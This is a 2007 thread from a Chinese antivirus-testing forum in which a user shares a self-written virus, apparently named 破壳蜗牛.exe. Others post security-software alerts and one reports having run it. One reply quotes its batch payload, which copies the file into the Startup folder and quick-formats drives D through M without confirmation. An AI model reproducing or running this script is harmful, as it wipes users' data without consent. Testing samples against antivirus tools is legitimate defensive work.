楼主: Saturn87930
收起左侧

[病毒样本] 新写的病毒 大家来杀啊~!

[复制链接]
Saturn87930
 楼主| 发表于 2007-5-6 11:50:33 | 显示全部楼层
本来想在开始直接设定个值为ALLDISK的,但不知道有用没,在后面用了,也不知道有用没~!
Saturn87930
 楼主| 发表于 2007-5-6 12:18:25 | 显示全部楼层
原帖由 wxb1994 于 2007-5-6 11:09 发表
救命啊,我运行了那个程序



大兄弟,回来了麻烦告诉我一下有什么状况
泄了……
jlj383940
发表于 2007-5-6 12:40:48 | 显示全部楼层
以下SNS:蜗牛要建*.TMP,阻止后直接砍了进程,不是怕FORMAT 它动不了我,而是怕注册表太大了,实机中SNS要是万一RD防不全(现在毒恶,专找冷门),FIXREG太烦了


2007-5-6 12:38:51        !**************************************************
                        Safe'n'Sec 警报
                        行为
                        时间: 2007-5-6 12:38:19
                        类型: 编辑一个文件/目录
                        风险: 中等
                        
                        程序
                        PID: 3216
                        PPID: 2184
                        UID: JLJ\jljqq
                        文件:E:\下载\破壳蜗牛\破壳蜗牛.EXE
                        
                        对象
                        文件/目录: C:\DOCUMENTS AND SETTINGS\JLJQQ\LOCAL SETTINGS\TEMP\IXP000.TMP\TMP4351$.TMP
                        用户操作:        阻止
                        ***************************************************

[ 本帖最后由 jlj383940 于 2007-5-6 12:50 编辑 ]
Nblock
发表于 2007-5-6 12:49:38 | 显示全部楼层
原帖由 xingyux1 于 2007-5-6 10:16 发表
微点
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\破壳蜗牛.EXE
1) C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\BT5106.BAT
是可疑程序!
试图执行Format操作!
是否阻止该进程 ...



    微点0day  有微点的不要运行格盘毒 小心系统挂掉

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
小邪邪
发表于 2007-5-6 12:52:02 | 显示全部楼层
.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
蓝色牛仔裤
发表于 2007-5-6 12:58:53 | 显示全部楼层

回复 #33 jlj383940 的帖子

用犀牛的话防住两个bat应该就行了吧..
Saturn87930
 楼主| 发表于 2007-5-6 12:59:28 | 显示全部楼层
有点疑惑,我写的代码我明白什么意思,但是我不知道为什么杀软会报后门程序……
    我没加什么外来的东西~!纯编写……
    难道杀软是以偏盖全,只要有害就归类为后门?
    沉思……
Nblock
发表于 2007-5-6 13:03:54 | 显示全部楼层
原帖由 Saturn87930 于 2007-5-6 12:59 发表
有点疑惑,我写的代码我明白什么意思,但是我不知道为什么杀软会报后门程序……
    我没加什么外来的东西~!纯编写……
    难道杀软是以偏盖全,只要有害就归类为后门?
    沉思……

。。。
Anycall-D908
发表于 2007-5-6 13:04:08 | 显示全部楼层
发作的时候是全格还是只格系统盘?在影子下观察情况怕不怕....(唉,自从玩了魔兽世界越来越胆小)
Nblock
发表于 2007-5-6 13:05:35 | 显示全部楼层
原帖由 Anycall-D908 于 2007-5-6 13:04 发表
发作的时候是全格还是只格系统盘?在影子下观察情况怕不怕....(唉,自从玩了魔兽世界越来越胆小)

date 1987-09-30
copy 破壳蜗牛.exe "C:\Documents and Settings\All Users\「开始」菜单\程序\启动"
@format d:/y/q
@format e:/y/q
@format f:/y/q
@format g:/y/q
@format h:/y/q
@format i:/y/q
@format j:/y/q
@format k:/y/q
@format l:/y/q
@format m:/y/q
运行下就知道了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 02:54 , Processed in 0.091992 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表